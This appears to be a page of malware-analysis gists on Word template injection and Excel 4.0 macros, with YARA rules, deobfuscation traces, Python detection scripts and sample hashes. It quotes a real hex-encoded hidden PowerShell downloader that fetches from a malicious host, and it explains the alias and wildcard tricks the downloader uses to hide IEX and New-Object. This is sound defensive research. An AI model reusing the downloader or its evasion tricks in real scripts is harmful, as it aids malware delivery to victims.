John Lambert (JohnLaTwC), Microsoft Corporation
[xlmdeobfuscator ASCII-art banner; rest of this gist preview truncated]
ed933e3c4add755c7e1066f2c8c765e8516fabb6445f1e5265e3bc11b6b50b1d
[xlmdeobfuscator ASCII-art banner; rest of this gist preview truncated]
@JohnLaTwC
JohnLaTwC / sample chain
Created May 24, 2020 17:31
Template injection attack 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
## Sample hash:
## DOCX: 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
## template injection: 79658efd6d19e0704902af2ea9e3a30a7c2dc624e7195998e3af3c2289877b8d
## VBS: 9d77e8df4dc2c49594dac3bed4373051f3b9dd5f1228d1eeeb63f5d8048d9685
## Payload: 6d3d5cc0a0b26be8180ae4ade5f5cec26c94d06754a62251869d832ac6fe1c0c
## http://moveis-schuster-com.ga/Order.jpg returns:
Powershell.exe -w h $asciiChars='24 54 52 50 3D 27 2A 2E 2A 2D 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 2E 2A 2D 27 2C 27 49 27 29 3B 20 73 61 6C 20 4D 61 73 74 65 72 20 24 54 52 50 3B 27 28 26 28 27 2B 27 47 27 2B 28 27 43 40 40 40 27 2E 72 65 70 6C 61 63 65 28 27 40 40 40 27 2C 27 4D 27 29 29 2B 27 20 2A 57 27 2B 27 2D 4F 2A 29 27 2B 20 27 4E 27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 65 28 27 27 68 74 74 70 3A 2F 2F 6D 6F 76 65 69 73 2D 73 63 68 75 73 74 65 72 2D 63
[Loading Cells]
auto_open: auto_openhmqja->Sheet2!$HT$59712
[Starting Deobfuscation]
CELL:HT59712 , FullEvaluation , SET.VALUE(Sheet2!IJ9596,-4545)
CELL:HT59713 , FullEvaluation , GOTO(AG21387)
CELL:AG21387 , FullEvaluation , SET.VALUE(Sheet2!GY52195,-50.25)
CELL:AG21388 , FullEvaluation , RUN(Sheet2!HU17490)
CELL:HU17490 , FullEvaluation , SET.VALUE(Sheet2!II36015,-424)
CELL:HU17491 , FullEvaluation , RUN(Sheet2!DX56863)
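The Order.jpg response quoted above is the next stage of the chain: Powershell.exe -w h (WindowStyle Hidden) is handed its script as a space-separated list of hex byte values, and the script underneath hides IEX and New-Object behind string .replace() calls and '+' concatenation. The Python below is an added example, not code from the gist or from xlmdeobfuscator: it pulls the hex blob out of the command line, decodes it, folds the literal .replace()/paren/concatenation layer until nothing changes, and reports the Set-Alias (sal) redirection and any URL. The hex is embedded as constructed test input copied from the gist and is the same truncated prefix the page shows, so the recovered URL stays truncated too. The regex passes are a heuristic for this particular single-quoted-string obfuscation, not a PowerShell parser.

```python
import re

# Constructed test input: the hex blob exactly as quoted in the gist (the page shows
# only this truncated prefix of what http://moveis-schuster-com.ga/Order.jpg returned).
ORDER_JPG_HEX = (
    "24 54 52 50 3D 27 2A 2E 2A 2D 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 2E 2A 2D 27 2C 27 49 27 29 3B 20 "
    "73 61 6C 20 4D 61 73 74 65 72 20 24 54 52 50 3B 27 28 26 28 27 2B 27 47 27 2B 28 27 43 40 40 40 27 2E 72 "
    "65 70 6C 61 63 65 28 27 40 40 40 27 2C 27 4D 27 29 29 2B 27 20 2A 57 27 2B 27 2D 4F 2A 29 27 2B 20 27 4E "
    "27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E "
    "44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 "
    "65 28 27 27 68 74 74 70 3A 2F 2F 6D 6F 76 65 69 73 2D 73 63 68 75 73 74 65 72 2D 63"
)
ORDER_JPG_RESPONSE = "Powershell.exe -w h $asciiChars='" + ORDER_JPG_HEX

_HEX_BLOB = re.compile(r"\$asciiChars='([0-9A-Fa-f]{2}(?: [0-9A-Fa-f]{2})*)")
# 'literal'.replace('a','b')  ->  'literal-with-a-replaced-by-b'  (String.Replace is literal)
_REPLACE = re.compile(r"'([^']*)'\.replace\('([^']*)','([^']*)'\)", re.IGNORECASE)
# ('literal')  ->  'literal'
_PAREN = re.compile(r"\('([^']*)'\)")
# 'ab' + 'cd'  ->  'abcd'
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
_SET_ALIAS = re.compile(r"\bsal\s+(\S+)\s+\$(\w+)", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def extract_hex_blob(cmdline: str) -> str:
    """Return the space-separated hex list assigned to $asciiChars in the command line."""
    m = _HEX_BLOB.search(cmdline)
    if not m:
        raise ValueError("no $asciiChars hex blob found")
    return m.group(1)


def decode_hex_chars(hex_blob: str) -> str:
    """Decode 'xx xx xx' into the PowerShell text it encodes (one byte per token)."""
    return bytes(int(tok, 16) for tok in hex_blob.split()).decode("latin-1")


def simplify_powershell(src: str) -> str:
    """Fold literal .replace(), redundant parens and string concatenation to a fixpoint.

    Heuristic only: it understands single-quoted literals glued with '+', which is
    what this sample uses; it is not a general PowerShell evaluator.
    """
    prev = None
    while src != prev:
        prev = src
        src = _REPLACE.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", src)
        src = _PAREN.sub(lambda m: "'" + m.group(1) + "'", src)
        src = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
    return src


def extract_indicators(simplified: str) -> dict:
    """Resolve 'sal <alias> $var' against string assignments and collect URLs."""
    assigns = dict(_ASSIGN.findall(simplified))
    aliases = {alias: assigns.get(var, "$" + var) for alias, var in _SET_ALIAS.findall(simplified)}
    return {"aliases": aliases, "urls": _URL.findall(simplified)}


if __name__ == "__main__":
    stage = decode_hex_chars(extract_hex_blob(ORDER_JPG_RESPONSE))
    print(stage)                       # raw second stage
    folded = simplify_powershell(stage)
    print(folded)                      # obfuscation layer folded
    print(extract_indicators(folded))  # alias -> IEX, truncated download URL
```

After folding, the visible part reads: $TRP='IEX'; sal Master $TRP;'(&(GCM *W-O*)Net.WebClient).DownloadFile(''http://moveis-schuster-c … . The first statement makes Master an alias for Invoke-Expression, so the later string can be executed without IEX ever appearing literally, and GCM *W-O* is the Get-Command wildcard trick meant to resolve to New-Object so that Net.WebClient can be instantiated for the download. The truncated URL is reported as-is; nothing beyond what the page shows is recovered.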
@JohnLaTwC
JohnLaTwC / get_cell_info
Created May 24, 2020 16:55
get_cell_info
def get_cell_info(self, sheet_name, col, row, type_ID):
    # Look up a cell on an Excel 4.0 macro sheet through the Excel COM object held
    # in self._excel (Application.Excel4MacroSheets returns the macro sheet by name).
    sheet = self._excel.Excel4MacroSheets(sheet_name)
    cell = col + row          # A1-style address, e.g. "HT" + "59712"
    data = None
    if int(type_ID) == 2:
        # type_ID 2: the caller wants the row number of the addressed cell
        data = sheet.Range(cell).Row
    print(data)
    return data
@JohnLaTwC
JohnLaTwC / 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60
Created May 23, 2020 17:39
xlmdeobfuscator output 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60
> xlmdeobfuscator --file 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60
[xlmdeobfuscator ASCII-art banner; rest of this gist preview truncated]
@JohnLaTwC
JohnLaTwC / templateinjection.txt
Created May 8, 2020 18:37
List of files that suggest template injection
@JohnLaTwC
JohnLaTwC / template_injection.yara
Created May 8, 2020 17:16
Word OXML Template Injection
rule gen_injected_template_Word
{
meta:
description = "Detects injected templates in DOCX"
author = "John Lambert @JohnLaTwC"
date = "2020-05-03"
hash1 = "a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063"
hash2 = "a275dfa95393148bb9e0ddf5346f9fedcc9c87fa2ec3ce1ec875843664c37c89"
hash3 = "ed4835e5fd10bbd2be04c5ea9eb2b8e750aff2ef235de6e0f18d369469f69c83"
file_protocol_hash1 = "ac6c1df3895af63b864bb33bf30cb31059e247443ddb8f23517849362ec94f08 (settings.xml.rels)"
@JohnLaTwC
JohnLaTwC / OOMLExcel4.0Macro.yara
Created April 15, 2020 19:17
OOML Excel 4.0 macro
rule gen_ModernExcel4Macro
{
meta:
description = "Detects Modern Excel4 macro use"
author = "John Lambert @JohnLaTwC"
date = "2020-04-15"
hash1 = "308c0fee671459705221c5f1a8cee944f5ea803fddd0faa620cc8266d48c662b"
hash2 = "618fee2c2f89a4f15b680e1ca9393d25c857e6d107fa0eb45b1a21c7601f975e"
reference1 = "https://twitter.com/DissectMalware/status/1250411834953420808"
strings:
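Both YARA previews above are cut off before their strings sections, so the byte patterns the rules key on are not visible here. As an added example, written for this page and not the author's rules or a replacement for them, the Python below checks the same two conditions structurally instead of by string match: a DOCX whose word/_rels/settings.xml.rels carries an attachedTemplate relationship with TargetMode="External" (template injection; the URL scheme is reported so http/https remote templates and file: targets, which the first rule's meta tracks separately, can be triaged differently), and an OOXML workbook that declares Excel 4.0 macro sheets (content type application/vnd.ms-excel.macrosheet+xml, parts under xl/macrosheets/). The sample documents are constructed in memory and are minimal stand-ins containing only the parts the scanner reads, not complete Office files; the relationship type, content type and part names are the standard OOXML ones.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML packaging identifiers.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
STYLES_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def scan_ooxml(data: bytes) -> dict:
    """Return template-injection and Excel 4.0 macrosheet indicators for one OOXML package."""
    findings = {"injected_templates": [], "macrosheets": []}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = set(pkg.namelist())

        # Word template injection: settings.xml references an attached template that
        # lives outside the package. Word fetches it on open, so a remote .dotm can
        # bring macros into a .docx that contains none itself. file: targets are
        # reported too (local/UNC paths are common in benign files, but a UNC path
        # still makes the client reach out, so they are worth a look).
        if SETTINGS_RELS in names:
            rels = ET.fromstring(pkg.read(SETTINGS_RELS))
            for rel in rels.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External":
                    target = rel.get("Target", "")
                    scheme = target.split(":", 1)[0].lower() if ":" in target else ""
                    findings["injected_templates"].append((target, scheme))

        # Excel 4.0 macros in OOXML: macro sheets are separate parts with their own
        # content type, declared in [Content_Types].xml and stored under xl/macrosheets/.
        if "[Content_Types].xml" in names:
            types = ET.fromstring(pkg.read("[Content_Types].xml"))
            for override in types.iter(f"{{{CT_NS}}}Override"):
                if override.get("ContentType") == MACROSHEET_CT:
                    findings["macrosheets"].append(override.get("PartName"))
        for name in sorted(names):  # catch parts even if the content-types manifest lies
            part = "/" + name
            if name.startswith("xl/macrosheets/") and name.endswith(".xml") \
                    and part not in findings["macrosheets"]:
                findings["macrosheets"].append(part)
    return findings


def _zip(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


def build_sample_docx(template_target=None) -> bytes:
    """Constructed minimal .docx stand-in; pass a target to inject an external template."""
    rels = [f'<Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>']
    if template_target is not None:
        rels.append(f'<Relationship Id="rId2" Type="{ATTACHED_TEMPLATE}" '
                    f'Target="{template_target}" TargetMode="External"/>')
    return _zip({
        "[Content_Types].xml": f'<Types xmlns="{CT_NS}"/>',
        "word/settings.xml": "<settings/>",
        SETTINGS_RELS: f'<Relationships xmlns="{REL_NS}">{"".join(rels)}</Relationships>',
    })


def build_sample_xlsm() -> bytes:
    """Constructed minimal .xlsm stand-in carrying one Excel 4.0 macro sheet."""
    return _zip({
        "[Content_Types].xml": (
            f'<Types xmlns="{CT_NS}">'
            '<Override PartName="/xl/workbook.xml" '
            'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
            f'<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="{MACROSHEET_CT}"/>'
            '</Types>'),
        "xl/workbook.xml": "<workbook/>",
        "xl/macrosheets/sheet1.xml": "<macrosheet/>",
    })


if __name__ == "__main__":
    print(scan_ooxml(build_sample_docx("http://example.invalid/template.dotm")))
    print(scan_ooxml(build_sample_docx(r"file:///C:/Users/Public/normal.dotm")))
    print(scan_ooxml(build_sample_xlsm()))
    print(scan_ooxml(build_sample_docx()))
```

Run it over a directory of samples by reading each file's bytes into scan_ooxml; an http/https scheme in injected_templates, or any entry in macrosheets, is what the two rules above are hunting for.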
@JohnLaTwC
JohnLaTwC / file list
Created April 2, 2020 23:09
Excel 4.0 macro "encrypted" files
18f844bea6822e4d3a8eee0722680661d00b80a42db2ea3e59bc433a9767f486
1a830e023a0947f2aff15f04acc6b3485c9cbc5ea7e0afeef532175e68fa9dc5
1b55ade7f333e718a0c43022832efa94f961b9d16ed14cabbb76e4b495b3870f
1c1df604fcf699da117ff934dedc7bc295f1bf78aa627f3cd092bcc617ecbc65
35c1fefb093e9612a5ab4caa9c45477885a49ec9d278de285ad2ed4ec4e51451
409003773e411ae1773be2aa77ab8da829bd91dc4088e5bb6202e0a842ad9ffe
4478b13059e5b208b3e79b53bae9f17e365fc43c36d4965c5ebe13dc2be1b2d9
4c3d65fd04b218f88b34b102e4b82ad7ea1cfce5109ca84a124dbf7b88ceab30
4c462533b34b4e65efc6e1dbdfd4f873c4d2222549f431e87f966756368eca8f
539e9628a7707d2877cbbbcc68a4410fc0129ffa8318dd4115e9ee65bfb9d2ba